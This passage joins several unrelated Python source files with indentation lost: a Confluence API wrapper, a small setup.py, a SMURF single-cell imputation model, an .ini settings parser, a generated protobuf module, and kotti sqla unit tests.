return ConfluenceAPI.__handle_html_information(content, page)
@classmethod
def __extract_page_properties_from_page(cls, content, label):
"""Extracts the page properties macro.
This method will extract the page properties macro from the confluence 'body.storage' content. Unfortunately due
to complexity, this method is yet to be written and should not be used.
Args:
content (str): The content to abstract the k-v pairs from.
label (str): The label given to the page_properties.
Returns:
dict: The page properties as key value pairs.
"""
# TODO: WRITE METHOD
return {content: label}
@classmethod
def __extract_page_properties(cls, content):
"""Extracts the page properties macro.
This method will extract the page properties macro. This method assumes that the content is in the format
returned by the make_master_details_request method.
Args:
content (dict): The content to abstract the k-v pairs from.
Returns:
dict: The page properties as key value pairs.
"""
if len(content['detailLines']) > 0:
keys = []
for k in content['renderedHeadings']:
keys.append(BeautifulSoup(k, 'html.parser').getText().strip())
values = []
# Get all possible details and overwrite the values of previous details if there is more
# information in the page properties currently being processed.
for detailLine in content['detailLines']:
details = []
for detail in detailLine['details']:
details.append(
ConfluenceAPI.__recursive_html_handler(detail))
if (len(values) < len(details)):
values = details.copy()
else:
for i, value in enumerate(details):
# Copy across the value from the details if more information is present
# otherwise ignore this copy.
if len(values[i]) == 0 or values[0] == '':
values[i] = value
page_properties = dict(zip(keys, values))
page_properties.pop('', None)
# Split columns with name (upi) into two separate properties.
page_properties_modified = page_properties.copy()
for k, v in page_properties.items():
names = []
upis = []
for val in v:
if type(val) is str:
if re.match(".+ \([a-z]{4}\d{3}\)", val):
user = re.findall("(.*) \((.*)\)", val)
if len(user) > 0:
names.append(user[0][0])
upis.append(user[0][1])
if len(names) > 0:
page_properties_modified[k] = names
page_properties_modified[k + "_UPIS"] = upis
# Remove empty key value pairs from dictionary.
keys = []
values = []
for k, v in page_properties_modified.items():
vals = []
for val in v:
if type(val) is str:
if val.replace(' ', '') not in ConfluenceAPI.empty_contents:
vals.append(val)
else:
vals.append(val)
if len(vals) > 0:
values.append(vals)
keys.append(k)
page_properties_modified = dict(zip(keys, values))
return page_properties_modified
else:
return {}
@classmethod
def __extract_panel_information(cls, content, panel):
"""Extracts panel information given some content.
Args:
content (str): The content to abstract the panel information from.
panel (str): The panel identifier.
Returns:
dict: The extracted panel information
"""
logger.debug(
'extract_panel_information: Panel to extract information from: %s' % panel)
html = BeautifulSoup(content, 'html.parser')
panel_container = ''
try:
panel_container = str(
html.find('b', string=panel).parent.next_sibling)
except:
logger.warning(
'__extract_panel_information: The following panel does not exists for the content provided: %s' % panel)
return ConfluenceAPI.__handle_html_information(panel_container, panel)
@classmethod
def get_homepage_id_of_space(cls, space):
"""Gets the homepage id of a space.
Args:
space (int): id of the space.
Returns:
int: The space homepage id.
"""
response = ConfluenceAPI.__make_rest_request('space', space, {})
logger.debug('get_homepage_id_of_space: %s has id of %d' %
(space, int(response['_expandable']['homepage'].replace('/rest/api/content/', ''))))
return int(response['_expandable']['homepage'].replace('/rest/api/content/', ''))
@classmethod
def get_last_update_time_of_content(cls, content_id):
"""Gets the last update time provided some content_id.
Args:
content_id (int): The id of the content to check the last update time for.
Returns:
datetime.datetime: The last update time.
"""
response = ConfluenceAPI.__make_rest_request(
'content', str(content_id), {'expand': 'version'})
return dateutil.parser.parse(response['version']['when'])
@classmethod
def get_page_labels(cls, content_id):
"""Gets a pages labels.
Args:
content_id(int): The id of the page to get labels of.
Returns:
labels: The labels of the page.
"""
labels = []
for label in ConfluenceAPI.__make_rest_request('content', str(content_id) + '/label', {})['results']:
labels.append(label['name'])
return labels
@classmethod
def get_page_content(cls, content_id):
"""Gets the page content.
This method acts as an alias for the make_rest_request but returns only the body of the page.
Args:
content_id(int): The id of the page to the content of.
Returns:
str: The body of the page.
"""
return ConfluenceAPI.__make_rest_request('content', str(content_id), {'expand': 'body.view'})['body']['view']['value']
@classmethod
def get_panel(cls, content, panel, space_id):
"""Gets a panels information
This method also performs cleanup on the Overview panel from the APPLCTN space.
Args:
content (str): The content to search in.
panel (str): Name of the panel to retrieve information for.
space_id (int): id of the space the information is coming from.
Returns:
dict: The information from the panel.
"""
panel_info = ConfluenceAPI.__extract_panel_information(content, panel)
if panel == 'Overview' and space_id == 65013279:
overview = {'Overview': ['']}
for info in panel_info['Overview']:
if type(info) is str:
overview['Overview'][0] = overview['Overview'][0] + info
else:
overview['Overview'].append(info)
temp = overview['Overview'][0].split(
'The application is accessible from these locations')
overview['Overview'][0] = temp[0]
return overview
return panel_info
@classmethod
def get_heading(cls, content, heading):
"""Gets a heading information
Args:
content (str): The content to search in.
heading (str): Name of the heading to retrieve information for.
Returns:
dict: The information from the heading.
"""
return ConfluenceAPI.__extract_heading_information(content, heading)
@classmethod
def get_page(cls, content, page_title):
"""Gets a whole pages information
Args:
content (str): The content to search in.
page_title (str): The name of the page.
Returns:
dict: The information from the page.
"""
return ConfluenceAPI.__extract_page_information(content, page_title)
@classmethod
def get_page_properties(cls, content_id, space_key, labels):
"""Gets page properties information
Args:
content_id (int): The id of the content page to retrieve the page properties from.
space_key (str): The name of the space this page exists in.
labels (list): A list of labels that the page should meet.
Returns:
dict: The page properties.
"""
cql = 'label in ('
for label in labels[:-1]:
cql += "'" + label + "',"
cql += "'" + labels[-1] + "') "
cql += 'AND id = ' + str(content_id)
return ConfluenceAPI.__extract_page_properties(ConfluenceAPI.__make_master_detail_request({'cql': cql, 'spaceKey': space_key}))
@classmethod
def check_page_exists(cls, page_id):
result = ConfluenceAPI.__make_rest_request('content', str(page_id), {})
if type(result) is not error.HTTPError:
return True
else:
if result.code == 404:
return False
else:
logger.info(
"check_page_exists: Unknown error for page with id: %s" % str(page_id))
return True
@classmethod
def get_page_urls(cls, content_id, url_type):
"""Gets page urls
Args:
content_id (int): The id of the content page to retrieve the urls for.
url_type (str): The url type that the user has requested.
Returns:
str: The page url.
"""
result = ConfluenceAPI.__make_rest_request(
'content', str(content_id), {})['_links']
return result['base'] + result[url_type]
@classmethod
def get_child_page_ids(cls, parent_id):
"""Gets the child page id's given a parent page id.
Args:
parent_id (int): Id of the parent page to get the children of.
# child_filter (str): cql filter to apply to retrieve only child pages that match the filter.
Returns:
list: A list of all the child ids of the parent page.
"""
page = 0
size = 25
children_id = {}
while size == 25:
response = ConfluenceAPI.__make_rest_request('content', str(parent_id) + '/child/page',
{'start': page, 'limit': 25, 'size': size,
'expand': 'version'})
results = response['results']
size = response['size']
page += response['size']
for result in results:
children_id[int(result['id'])] = {
'name': result['title'], 'last_updated': dateutil.parser.parse(result['version']['when'])}
return children_id
@classmethod
def __handle_html_information(cls, content, content_name):
"""Handles html information
This method will handle the HTML input, returning it as a dictionary.
Args:
content (str): The content to turn into a usable dictionary.
content_name (str): The name/heading/label associated with the content.
Returns:
dict: A usable dictionary that contains the content only (no HTML).
"""
return {content_name: ConfluenceAPI.__recursive_html_handler(content)}
@classmethod
def __recursive_html_handler(cls, content):
"""Handles html information
This method will handle the HTML input, returning it as a dictionary.
Args:
content (str): The content to turn into a usable dictionary.
Returns:
list: A list dictionary that contains the content only (no HTML).
"""
# Remove all newline characters and remove all spaces between two tags.
content = re.sub('>+\s+<', '><', content.replace('\n', ''))
heading = ['h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7']
supported_tags = ['p', 'span', 'h1', 'h2', 'h3',
'h4', 'h5', 'h6', 'h7', 'a', 'ul', 'table']
content_list = []
html = BeautifulSoup(content, 'html.parser')
# Go down the hierarchy until we are at a non-div element.
contents = html
if contents.contents:
while contents.contents[0].name == 'div':
contents = contents.contents[0]
# Look at each of the provided html's children tags and handle data for different cases.
for tag in contents.children:
# Check if previous sibling was a heading.
if tag.previous_sibling:
if tag.previous_sibling.name in heading:
continue
# Making sure we are at the lowest element in the current tag.
while tag.name == 'div':
tag = tag.contents[0]
if tag.name == 'ul':
# List handling
for child in tag.children:
child_to_insert = child.getText().strip()
if child.find('table', recursive=False):
child_to_insert = ConfluenceAPI.__recursive_html_handler(
str(child.find('table', recursive=False)))
if child.find('ul', recursive=False):
child_to_insert = ConfluenceAPI.__recursive_html_handler(
str(child.find('ul', recursive=False)))
if child_to_insert not in ConfluenceAPI.empty_contents:
content_list.append(child_to_insert)
elif tag.name == 'table':
# Table handling.
table = tag.find('tbody')
horizontal_headings = []
vertical_heading = None
table_dict = {}
for row in table.children:
# noinspection PyBroadException
try:
current_column = 0
headings_only_row = not row.find('td')
for data in row.children:
if headings_only_row:
horizontal_headings.append(
data.getText().strip())
else:
# Data could be a heading or actual data depending on layout of
# table.
if data.name == 'th':
vertical_heading = data.getText().strip()
else:
data_to_insert = data.getText().strip()
if data.find('table', recursive=False):
data_to_insert = ConfluenceAPI.__recursive_html_handler(
str(data.find('table', recursive=False)))
if data.find('ul', recursive=False):
data_to_insert = ConfluenceAPI.__recursive_html_handler(
str(data.find('ul', recursive=False)))
if data_to_insert not in ConfluenceAPI.empty_contents:
if len(horizontal_headings) == 0 and vertical_heading is None:
# Dealing with a completely flat table.
content_list.append(data_to_insert)
elif len(horizontal_headings) == 0:
if vertical_heading in table_dict:
table_dict[vertical_heading].append(
data_to_insert)
else:
table_dict[vertical_heading] = [
data_to_insert]
elif vertical_heading is None:
if horizontal_headings[current_column] in table_dict:
table_dict[horizontal_headings[current_column]].append(
data_to_insert)
else:
table_dict[horizontal_headings[current_column]] = [
data_to_insert]
else:
if horizontal_headings[current_column] in table_dict:
if vertical_heading in table_dict[horizontal_headings[current_column]]:
table_dict[horizontal_headings[current_column]][vertical_heading].append(
data_to_insert)
else:
table_dict[horizontal_headings[current_column]][vertical_heading] = [
data_to_insert]
else:
table_dict[horizontal_headings[current_column]] = {
vertical_heading: [data_to_insert]}
current_column += 1
except:
logger.error(
'recursive_html_handler: Unable to parse table: %s', tag.getText().strip())
if table_dict != {}:
content_list.append(table_dict)
elif tag.name in heading:
heading_to_insert = tag.getText().strip()
heading_content = ConfluenceAPI.__recursive_html_handler(
str(tag.next_sibling))
content_list.append({heading_to_insert: heading_content})
elif tag.name in supported_tags:
information_to_insert = tag.getText().strip()
if tag.find('table', recursive=False):
information_to_insert = ConfluenceAPI.__recursive_html_handler(
str(tag.find('table', recursive=False)))
if tag.find('ul', recursive=False):
information_to_insert = ConfluenceAPI.__recursive_html_handler(
str(tag.find('ul', recursive=False)))
# Content does not contain any lists, tables or links to a user so just return the information.
if tag.find('a', class_='user-mention') or 'data-username' in tag.attrs:
if tag.find('a', class_='user-mention'):
for user in tag.find_all('a', class_='user-mention'):
if user.string is not None and 'data-username' in user.attrs:
content_list.append(user.string + " (" + user.attrs['data-username'] + ")")
else:
content_list.append(
tag.string + " (" + tag.attrs['data-username'] + ")")
else:
if information_to_insert not in ConfluenceAPI.empty_contents:
content_list.append(information_to_insert)
elif type(tag) is NavigableString:
content_list.append(str(tag.string).strip())
return content_list
|
import setuptools
setuptools.setup(
name="pycef",
version="1.0",
author="Bubba",
author_email="bubbapy@protonmail.ch",
description="A py wrapper for close ended fund connect portal",
long_description='Rough API around cefconnect.com via web scraping',
long_description_content_type="text/markdown",
url="https://github.com/pypa/sampleproject",
packages=setuptools.find_packages(),
classifiers=(
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
),
)
|
# _*_ coding: utf-8 _*_
"""
Time: 2021/7/22 17:29
Author: WANG Bingchen
Version: V 0.1
File: model.py
Describe:
"""
from .lossFunc import *
from .initialParams import *
import pandas as pd
from .optimize import CVOptimize, FanoOptimize, CCVOptimize
from . import utiles
from .cell_circle import CellCircle
import warnings
warnings.filterwarnings("ignore")
class SMURF():
def __init__(self, n_features=20, steps=10, alpha=1e-5, eps=10, noise_model="Fano", normalize=True, calculateIntialNoiseFactor=False, estimate_only=False):
self.K = n_features
self.batchSize = n_features * 10
self.steps = steps
self.alpha = alpha
self.eps = eps
self.normalize = normalize
self.noise_model = noise_model
self.calculateLossFunc = True
self.estmate_only = estimate_only
self.calculateIntialNoiseFactor = calculateIntialNoiseFactor
def _check_params(self):
"""Check parameters
This allows us to fail early - otherwise certain unacceptable
parameter choices, such as n='10.5', would only fail after
minutes of runtime.
Raises
------
ValueError : unacceptable choice of parameters
"""
utiles.check_positive(n_features=self.K, eps=self.eps, batchsize=self.batchSize, alpha=self.alpha,
steps=self.steps)
utiles.check_int(n_features=self.K, steps=self.steps)
utiles.check_between(v_min=0, v_max=min(self.genes, self.cells), n_features=self.K)
utiles.check_bool(normalize=self.normalize)
utiles.check_bool(iteration=self.calculateIntialNoiseFactor)
utiles.check_noise_model(noise_model=self.noise_model)
def MFConstantVariance(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
Vc = np.ones((1, self.cells)) * 1.0
if self.calculateIntialNoiseFactor:
Vg = getv(self.A, u)
v = np.dot(Vg, Vc)
else:
Vg = np.ones((self.genes, 1))
v = np.dot(Vg, Vc)
LossFuncGre = 0
LossFunc = 0
Lossf = []
nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionConstantVariance(u[g][c], v[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step+1)*(self.eps+1)
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if Vg[g][0] <= 1e-09:
Vg[g][0] = 1e-09
dG, dH, dVg = CVOptimize(A, G, H, u, Vg, Vc, v, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
Vg[g, :] = Vg[g, :] + self.alpha * dVg
u = np.dot(G, H)
v = np.dot(Vg, Vc)
print("number of iteration: ", step+1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def MFFano(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
bc = np.ones((1, self.cells)) * 1.0
if self.calculateIntialNoiseFactor:
bg = getb(self.A, u)
else:
bg = np.ones((self.genes, 1)) * 1.0
b = np.dot(bg, bc)
LossFunc = 0
LossFuncGre = 0
Lossf = []
nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionFano(u[g][c], b[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step + 1)*self.eps
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if bg[g][0] <= 1e-09:
bg[g][0] = 1e-09
b[g][c] = np.dot(bg[g, :], bc[:, c])
dG, dH, dbg = FanoOptimize(A, G, H, u, bg, bc, b, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
bg[g, :] = bg[g, :] + self.alpha * dbg
u = np.dot(G, H)
b = np.dot(bg, bc)
self.alpha = self.alpha*(1 - (np.float(step)/np.float(self.steps)))
print("number of iteration: ", step+1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def MFConstCoeffiVariation(self):
G = self.G
H = self.H
A = self.A
u = np.dot(G, H)
ac = np.ones((1, self.cells))
if self.calculateIntialNoiseFactor:
ag = geta(self.A, u)
else:
ag = np.ones((self.genes, 1))
a = np.dot(ag, ac)
LossFunc = 0
LossFuncGre = 0
Lossf = []
nonZerosInd = np.nonzero(A)
numNonZeros = nonZerosInd[0].size
nonZeroElem = np.concatenate((nonZerosInd[0].reshape(numNonZeros, 1), nonZerosInd[1].reshape(numNonZeros, 1)),
axis=1)
for step in range(self.steps):
if self.calculateLossFunc:
for element in nonZeroElem:
g = element[0]
c = element[1]
LossFuncCG = LossFunctionConstantCoefficientVariation(u[g][c], a[g][c], A[g][c], G, H, g, c)
LossFunc = LossFunc + LossFuncCG
else:
LossFunc = (step + 1)*self.eps
if abs(LossFunc - LossFuncGre) < self.eps:
Lossf.append(LossFunc)
print("already converge")
break
else:
Lossf.append(LossFunc)
LossFuncGre = LossFunc
LossFunc = 0
np.random.shuffle(nonZeroElem)
batchElements = nonZeroElem[0:self.batchSize - 1, :]
for element in batchElements:
g = element[0]
c = element[1]
if u[g][c] <= 0.01:
u[g][c] = 0.01
if ag[g][0] <= 1e-09:
ag[g][0] = 1e-09
if ac[0][c] <= 1e-09:
ac[0][c] = 1e-09
dG, dH, dag, dac = CCVOptimize(A, G, H, u, ag, ac, a, g, c)
G[g, :] = G[g, :] + self.alpha * dG
H[:, c] = H[:, c] + self.alpha * dH
ag[g, :] = ag[g, :] + self.alpha * dag
u = np.dot(G, H)
a = np.dot(ag, ac)
print("number of iteration: ", step + 1, "/", self.steps)
u = np.dot(G, H)
u[u < 0] = 0
return u, G, H
def smurf_impute(self, initialDataFrame):
self.initialDataFrame = initialDataFrame
self.genes = initialDataFrame.shape[0]
self.cells = initialDataFrame.shape[1]
self.genesNames = initialDataFrame._stat_axis.values.tolist()
self.cellsNames = initialDataFrame.columns.values.tolist()
print("Running SCEnd on {} cells and {} genes".format(self.cells, self.genes))
if self.normalize:
print("normalizing data by library size...")
normalizedDataframe, self.size_factors = utiles.dataNormalization(self.initialDataFrame)
self.A = normalizedDataframe.values
self.G, self.H = initialMatrices(normalizedDataframe.values, self.K)
self._check_params()
print("preprocessing data...")
if self.noise_model == "CV":
u, G, H = self.MFConstantVariance()
if self.noise_model == "Fano":
u, G, H = self.MFFano()
if self.noise_model == "CCV":
u, G, H = self.MFConstCoeffiVariation()
newDataFrame = pd.DataFrame(u, index=self.genesNames, columns=self.cellsNames)
newDataFrame = newDataFrame * self.size_factors
res = {}
res["estimate"] = newDataFrame
res["gene latent factor matrix"] = pd.DataFrame(G, index=self.genesNames, columns=None)
res["cell latent factor matrix"] = pd.DataFrame(H, index=None, columns=self.cellsNames)
self.glfm = G
self.clfm = H
if self.estmate_only:
return res["estimate"]
else:
return res
else:
self.A = self.initialDataFrame.values
self.G, self.H = initialMatrices(self.initialDataFrame.values, self.K)
self._check_params()
print("preprocessing data...")
if self.noise_model == "CV":
u, G, H = self.MFConstantVariance()
if self.noise_model == "Fano":
u, G, H = self.MFFano()
if self.noise_model == "CCV":
u, G, H = self.MFConstCoeffiVariation()
newDataFrame = pd.DataFrame(u, index=self.genesNames, columns=self.cellsNames)
res = {}
res["estimate"] = newDataFrame
res["gene latent factor matrix"] = pd.DataFrame(G, index=self.genesNames, columns=None)
res["cell latent factor matrix"] = pd.DataFrame(H, index=None, columns=self.cellsNames)
self.glfm = G
self.clfm = H
if self.estmate_only:
return res["estimate"]
else:
return res
def smurf_cell_circle(self, cells_data=None, n_neighbors=20, min_dist=0.01, major_axis=3, minor_axis=2, k=0.2):
self.n_neighbors = n_neighbors
self.min_dist = min_dist
self.major_axis = major_axis
self.minor_axis = minor_axis
self.k = k
if cells_data:
data = cells_data
else:
if self.clfm.all():
data = self.clfm
else:
raise AttributeError("Cells Data Expected")
cell_circle_mapper = CellCircle(n_neighbors=self.n_neighbors, min_dist=self.min_dist)
res = cell_circle_mapper.cal_cell_circle(data, a=self.major_axis, b=self.minor_axis, k=0.2)
return res
|
""" Utilities for parsing settings """
def asdict(setting, value_type=lambda x: x):
"""
Parses config values from .ini file and returns a dictionary
Parameters
----------
setting : str
The setting from the config.ini file
value_type : callable
Run this function on the values of the dict
Returns
-------
data : dict
"""
result = {}
if setting is None:
return result
if isinstance(setting, dict):
return setting
for line in [line.strip() for line in setting.splitlines()]:
if not line:
continue
key, value = line.split('=', 1)
result[key.strip()] = value_type(value.strip())
return result
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: app_health_config_variable.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='app_health_config_variable.proto',
package='monitor_config',
syntax='proto3',
serialized_options=_b('ZHgo.easyops.local/contracts/protorepo-models/easyops/model/monitor_config'),
serialized_pb=_b('\n app_health_config_variable.proto\x12\x0emonitor_config\"l\n\x17\x41ppHealthConfigVariable\x12\x0c\n\x04type\x18\x01 \x01(\t\x12\n\n\x02id\x18\x02 \x01(\t\x12\x0c\n\x04\x66rom\x18\x03 \x01(\t\x12\x0c\n\x04name\x18\x04 \x01(\t\x12\x0c\n\x04\x61ttr\x18\x05 \x01(\t\x12\r\n\x05value\x18\x06 \x03(\tBJZHgo.easyops.local/contracts/protorepo-models/easyops/model/monitor_configb\x06proto3')
)
_APPHEALTHCONFIGVARIABLE = _descriptor.Descriptor(
name='AppHealthConfigVariable',
full_name='monitor_config.AppHealthConfigVariable',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='monitor_config.AppHealthConfigVariable.type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='id', full_name='monitor_config.AppHealthConfigVariable.id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='from', full_name='monitor_config.AppHealthConfigVariable.from', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='monitor_config.AppHealthConfigVariable.name', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='attr', full_name='monitor_config.AppHealthConfigVariable.attr', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='monitor_config.AppHealthConfigVariable.value', index=5,
number=6, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=52,
serialized_end=160,
)
DESCRIPTOR.message_types_by_name['AppHealthConfigVariable'] = _APPHEALTHCONFIGVARIABLE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
AppHealthConfigVariable = _reflection.GeneratedProtocolMessageType('AppHealthConfigVariable', (_message.Message,), {
'DESCRIPTOR' : _APPHEALTHCONFIGVARIABLE,
'__module__' : 'app_health_config_variable_pb2'
# @@protoc_insertion_point(class_scope:monitor_config.AppHealthConfigVariable)
})
_sym_db.RegisterMessage(AppHealthConfigVariable)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
|
import json
from mock import MagicMock
from pyramid.security import ALL_PERMISSIONS
class TestNestedMutationDict:
def test_dictwrapper_comparison(self):
from kotti.sqla import NestedMutationDict
assert NestedMutationDict({}) == NestedMutationDict({})
assert (
NestedMutationDict({'a': 'ok'}) == NestedMutationDict({'a': 'ok'}))
def test_listwrapper_comparison(self):
from kotti.sqla import NestedMutationList
assert NestedMutationList({}) == NestedMutationList({})
assert (
NestedMutationList(['ok']) == NestedMutationList(['ok']))
def test_dictwrapper_changed(self):
from kotti.sqla import NestedMutationDict
data = {}
wrapper = NestedMutationDict(data)
changed = wrapper.changed = MagicMock()
wrapper['name'] = 'andy'
assert data == {'name': 'andy'}
assert wrapper == {'name': 'andy'}
assert wrapper['name'] == 'andy'
assert changed.call_count == 1
wrapper['age'] = 77
assert data == {'name': 'andy', 'age': 77}
assert wrapper['age'] == 77
assert wrapper['name'] == 'andy'
assert changed.call_count == 2
wrapper['age'] += 1
assert data == {'name': 'andy', 'age': 78}
assert wrapper['age'] == 78
assert changed.call_count == 3
def test_listwrapper_changed(self):
from kotti.sqla import NestedMutationList
data = []
wrapper = NestedMutationList(data)
changed = wrapper.changed = MagicMock()
wrapper.append(5)
assert data == [5]
assert wrapper == [5]
assert wrapper[0] == 5
assert changed.call_count == 1
wrapper.insert(0, 33)
assert data == [33, 5]
assert wrapper[0] == 33
assert changed.call_count == 2
del wrapper[0]
assert data == [5]
assert wrapper[0] == 5
assert changed.call_count == 3
def test_dictwrapper_wraps(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
wrapper = NestedMutationDict(
{'name': 'andy', 'age': 77, 'children': []})
changed = wrapper.changed = MagicMock()
wrapper['name'] = 'randy'
assert changed.call_count == 1
assert isinstance(wrapper['children'], NestedMutationList)
wrapper['children'].append({'name': 'sandy', 'age': 33})
assert changed.call_count == 2
assert len(wrapper['children']), 1
assert isinstance(wrapper['children'][0], NestedMutationDict)
def test_listwrapper_wraps(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
wrapper = NestedMutationList(
[{'name': 'andy', 'age': 77, 'children': []}])
changed = wrapper.changed = MagicMock()
assert isinstance(wrapper[0], NestedMutationDict)
assert isinstance(wrapper[0]['children'], NestedMutationList)
assert changed.call_count == 0
def test_setdefault_dict(self):
from kotti.sqla import NestedMutationDict
mdict = NestedMutationDict({})
assert isinstance(mdict.setdefault('bar', {}), NestedMutationDict)
def test_setdefault_list(self):
from kotti.sqla import NestedMutationDict
from kotti.sqla import NestedMutationList
mdict = NestedMutationDict({})
assert isinstance(mdict.setdefault('bar', []), NestedMutationList)
def test_setdefault_parent(self):
from kotti.sqla import NestedMutationDict
mdict = NestedMutationDict({})
assert mdict.setdefault('bar', []).__parent__ is mdict
def test_dunder_json(self):
from kotti.sqla import NestedMutationDict
data = {"some": ["other", {"stuff": 1}]}
mdict = NestedMutationDict(data)
assert json.loads(json.dumps(mdict.__json__(None))) == data
class TestJsonType:
def make(self):
from kotti.sqla import JsonType
return JsonType()
def test_process_bind_param_no_value(self):
value = self.make().process_bind_param(None, None)
assert value is None
def test_process_bind_param_with_value(self):
value = self.make().process_bind_param([{'foo': 'bar'}], None)
assert value == '[{"foo": "bar"}]'
def test_process_bind_param_with_mutationlist(self):
from kotti.sqla import MutationList
value = self.make().process_bind_param(
MutationList([{'foo': 'bar'}]), None)
assert value == '[{"foo": "bar"}]'
def test_process_result_value_no_value(self):
value = self.make().process_result_value(None, None)
assert value is None
def test_process_result_value_with_value(self):
value = self.make().process_result_value('[{"foo": "bar"}]', None)
assert value == [{"foo": "bar"}]
class TestACLType:
def make(self):
from kotti.sqla import ACLType
return ACLType()
def test_process_bind_param_no_value(self):
value = self.make().process_bind_param(None, None)
assert value is None
def test_process_bind_param_with_value(self):
value = self.make().process_bind_param(
[('Allow', 'role:admin', 'edit')], None)
assert value == '[["Allow", "role:admin", "edit"]]'
def test_process_bind_param_with_default_permissions(self):
acl = [('Allow', 'role:admin', ALL_PERMISSIONS)]
value = self.make().process_bind_param(acl, None)
assert value == '[]'
def test_process_bind_param_with_empty_list(self):
value = self.make().process_bind_param([], None)
assert value == '[]'
def test_process_bind_param_with_default_permissions_and_others(self):
acl = [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Deny', 'role:admin', 'edit'),
]
value = self.make().process_bind_param(acl, None)
assert value == '[["Deny", "role:admin", "edit"]]'
assert self.make().process_result_value(value, None) == acl
def test_process_result_value_no_value(self):
value = self.make().process_result_value(None, None)
assert value is None
def test_process_result_value_with_value(self):
acl = self.make().process_result_value(
'[["Allow", "role:admin", "edit"]]', None)
assert acl == [
('Allow', 'role:admin', ALL_PERMISSIONS),
('Allow', 'role:admin', 'edit'),
]
class TestMutationList:
def test_radd(self):
from kotti.sqla import MutationList
mlist = MutationList(['foo'])
assert ['bar'] + mlist == ['bar', 'foo']
class TestMutationDunderJson:
def test_dunder_json(self):
from kotti.sqla import MutationList
mlist = MutationList(['foo'])
json.loads(json.dumps(mlist.__json__())) == ['foo']
def test_dunder_json_recursive(self):
from kotti.sqla import MutationList
from kotti.sqla import MutationDict
mlist = MutationList([
MutationDict({'foo': MutationList([{'bar': 'baz'}])}),
{'foo': ['bar', 'baz']},
])
json.loads(json.dumps(mlist.__json__())) == [
{'foo': [{'bar': 'baz'}]},
{'foo': ['bar', 'baz']},
]
mdict = MutationDict({
'foo': MutationList([{'bar': 'baz'}]),
'bar': ['bar', 'baz'],
})
json.loads(json.dumps(mdict.__json__())) == {
